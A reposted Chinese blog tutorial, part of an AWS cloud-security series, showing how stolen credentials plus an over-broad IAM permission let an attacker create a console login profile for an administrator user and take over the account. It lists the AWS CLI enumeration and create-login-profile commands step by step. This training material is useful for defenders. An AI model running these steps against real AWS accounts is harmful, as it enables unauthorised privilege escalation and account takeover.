AWS云安全系列 5 - IAM不严谨的权限 II
2022-4-21 10:48:42 Author: mp.weixin.qq.com(查看原文) 阅读量:6 收藏

国内云安全培训请点击原文或访问以下链接

https://www.yuque.com/u8047536/supvqp/ri4ft0

前提是已经获取了相关的密钥

步骤 1:将 AWS CLI配置为访问凭证


步骤 2:获取当前用户的详细信息

 aws iam get-user

步骤 3:获取有关附加到用户的策略的信息

aws iam list-user-policies --user-name xxaws iam get-user-policy --user-name xx --policy-name terraform-20210211093521341300000001

 用户有权为任何用户创建登录配置文件。

步骤 4:查看附加了“管理员访问”策略的用户

aws iam list-usersaws iam list-attached-user-policies --user-name AdminBob

步骤 5:为用户 AdminBob创建  登录配置文件

aws iam create-login-profile --user-name AdminBob --password [email protected] --no-password-reset-required

步骤 7: 使用 IAM 用户AdminBob ,“[email protected]在 AWS 控制台中登录

已成功 访问 AdminBob用户。

1.AWSCLI(https://docs.aws.amazon.com/cli/latest/reference/)


文章来源: http://mp.weixin.qq.com/s?__biz=MzA4MDMwMjQ3Mg==&mid=2651868005&idx=1&sn=e8f5566ca03736849f16d69a456fe75d&chksm=8442b382b3353a9401bc9535f2c2ef2a1d482320458eab2bd622ff8591ca5d49997036d04bb4#rd
如有侵权请联系:admin#unsafe.sh